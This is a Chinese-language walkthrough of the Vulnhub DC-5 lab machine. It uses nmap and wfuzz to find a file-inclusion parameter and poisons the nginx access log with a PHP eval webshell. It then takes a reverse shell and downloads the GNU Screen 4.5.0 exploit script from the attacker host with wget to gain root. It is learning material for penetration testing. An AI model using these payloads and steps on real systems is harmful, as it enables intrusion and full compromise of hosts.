DC-5复盘笔记
日志文件包含nmap扫描
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ nmap -sT --min-rate 10000 -p- 192.168.140.94 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 22:55 EDT
Nmap scan report for 192.168.140.94
Host is up (0.0021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp openhttp
111/tcp openrpcbind
42496/tcp openunknown(42496 是 rpc.statd(NFS 状态服务)动态分配的 RPC 服务端口)
MAC Address: 08:00:27:A9:4A:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 130.00 seconds
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ nmap -sT -sC -sV -O -p80,111,42496 192.168.140.94 -oA nmapscan/detail
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 22:58 EDT
Nmap scan report for 192.168.140.94
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
80/tcp openhttp nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp openrpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/protoservice
| 1000002,3,4 111/tcp rpcbind
| 1000002,3,4 111/udp rpcbind
| 1000003,4 111/tcp6rpcbind
| 1000003,4 111/udp6rpcbind
| 1000241 38651/tcp6status
| 1000241 42496/tcp status
| 1000241 49034/udp6status
|_1000241 50944/udp status
42496/tcp openstatus1 (RPC #100024)
MAC Address: 08:00:27:A9:4A:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ nmap --script=vuln -p80,111,42496 192.168.140.94 -oA nmapscan/vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 23:00 EDT
Nmap scan report for 192.168.140.94
Host is up (0.0012s latency).
PORT STATE SERVICE
80/tcp openhttp
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.140.94
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.140.94:80/contact.php
| Form id: fname
|_ Form action: thankyou.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp openrpcbind
42496/tcp openunknown
MAC Address: 08:00:27:A9:4A:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 80.33 seconds没有扫描出什么重要信息
web
在vulnhub官网上可以看到相关hint:
As far as I am aware, there is only one exploitable entry point to get in
(there is no SSH either).
This particular entry point may be quite hard to identify, but it is there.
You need to look for something a little out of the ordinary
(something that changes with a refresh of a page).
This will hopefully provide some kind of idea as to what the vulnerability might involve.
据我所知,只有一个可利用的入口点可以进入(也没有 SSH)。
这个特定的入口点可能很难识别,但它就在那里。您需要寻找一些与众不同的东西
(随着页面刷新而变化的东西)。这有望为漏洞可能涉及的内容提供某种想法。
And just for the record, there is no phpmailer exploit involved. :-)
仅供记录,不涉及 phpmailer 漏洞。:-)刷新页面,没有发生任何变化
在contact.php有唯一可以交互的表单
随便填点东西进去
submit 过后,会转到这个url:
http://192.168.140.94/thankyou.php?firstname=1&lastname=1&country=australia&subject=1
在这个页面刷新,可以发现底下的年份会改变
查看源码
<footer>
Copyright © 2018 </footer>
在一个 PHP 的 CMS(内容管理系统)中,常见会有一个名为 **footer.php** 的文件,专门用于管理网页底部的 HTML 代码(例如这个标签)
MVC 分离 / 模板重用 是大多数 CMS(比如 WordPress、ThinkPHP、Discuz、Drupal、Joomla 等)所采用的设计原则。为了便于维护,通常会将页面结构拆成几个部分,例如:
文件名用途说明header.php网页头部内容(如
、导航栏)footer.php页脚内容(如版权、备案号、脚本)sidebar.php侧边栏内容index.php首页逻辑content.php主体内容部分这里已经在html写了Copyright © 2018,那会不会有可能通过文件包含的方式把其他年份(比如用footer.php)将其包含进去呢
查看同一目录下是否有footer.php
发现每次刷新,这个年份都会变,印证了之前的猜想,大概率是有文件包含的
对这个路径进行FUZZ测试,查看是否有别的参数:
wfuzz -u http://192.168.140.94/thankyou.php?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh=851
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.140.94/thankyou.php?FUZZ=test
Total requests: 6453
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002206: 200 42 L 63 W 835 Ch "file"
Total time: 0
Processed Requests: 6453
Filtered Requests: 6452
Requests/sec.: 0可以看到有一个file参数,尝试赋值index.php
看到是可以正常文件包含的
尝试远程文件包含
似乎无法利用
稍微对文件包含的值做一个测试,看看能包含什么可以利用的文件
**LFI-LFISuite-pathtotest-huge.txt**** 是LFI中最全面、最庞大的敏感文件路径列表**,适合做 LFI 路径暴力测试。
刚才看了下,这个目录下的字典好像都没有囊括日志文件
手测日志文件是否能包含
之前nmap详细扫描得到:80/tcp openhttp nginx 1.6.2
尝试包含/var/log/ningx/access.log
成功包含
现在需要构造合适的请求,看看能否包含
这里实验了一下,
1 如果直接在url或hackbar构造/muma
日志没有成功解析php,会显示url编码的木马"GET /hahahhaha%3C?php%20@eval($_POST[%27a%27]);?%3E HTTP/1.1" 404 142
这样的形式。直接hackbar post请求也是不行的
2 尽量把 PHP 代码放到日志的“主体”部分
比如尝试放到 User-Agent、Referer、Cookie 等头部字段,通常这部分内容更干净,日志里也更容易被 PHP 解释。
试了在hackbar user-agent解析成功
- "GET / HTTP/1.1" 200 1718 "-" "ooooooooops" 192.168.140.122
3 burpsuite还是直接放在请求中
GET / HTTP/1.1
Host: 192.168.140.94
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
改为
GET /OoOoOps<?php @eval($_POST['a']);?>HTTP/1.1
Host: 192.168.140.94
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close回显:
"GET /OoOoOps HTTP/1.1" 404 200这样请求也是可以解析成功的
使用蚁剑连接
连接成功
在蚁剑的虚拟shell上反弹shell
提权
┌──(kali㉿kali)-
└─$ nc -lvnp 1234
listening on 1234 ...
connect to from (UNKNOWN) 49702
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ sudo -l
/bin/sh: 2: sudo: not found
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
$ suid中这个程序很有意思,而且给了版本:/bin/screen-4.5.0
searchsploit:
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ searchsploit screen 4.5.0
---------------------------------------------------- ---------------------------------
Exploit Title |Path
---------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
---------------------------------------------------- ---------------------------------
Shellcodes: No Results拷贝这个脚本
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ searchsploit screen -m 41154
[!] Could not find EDB-ID #
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
Codes: N/A
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /home/kali/Vulnhub/dc5/41154.sh
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ php -S 0:80
PHP 8.4.4 Development Server (http://0:80) started
192.168.140.94:44684 Accepted
192.168.140.94:44684 : GET /41154.sh
192.168.140.94:44684 Closing$ cd /tmp
$ ls
f
$ wget http://192.168.140.200/41154.sh
converted 'http://192.168.140.200/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.140.200/41154.sh' (UTF-8)
--2025-07-26 14:49:44--http://192.168.140.200/41154.sh
Connecting to 192.168.140.200:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K)
Saving to: '41154.sh'
0K . 100% 64.8M=0s
2025-07-26 14:49:44 (64.8 MB/s) - '41154.sh' saved
$ ls
41154.sh
f
$ chmod +x 41154.sh
$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
whoami
root
cd /root
ls
thisistheflag.txt
cat thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b888 888 888 888 888
888Y88b 888 888.d8888b .d88b. 888888888.d88b.888d888 888888 888 888 888
888 Y88b888 888 d88P" d8PY8b 888888888 d88""88b 888P" 888 .88P 888 888 888
888Y88888 888 888 88888888 888888888 888888 888 888888KY8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b" " "
888 Y888 888"Y8888P "Y8888 "Y8888888P" "Y88P"888 888888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.:-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.提权成功
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]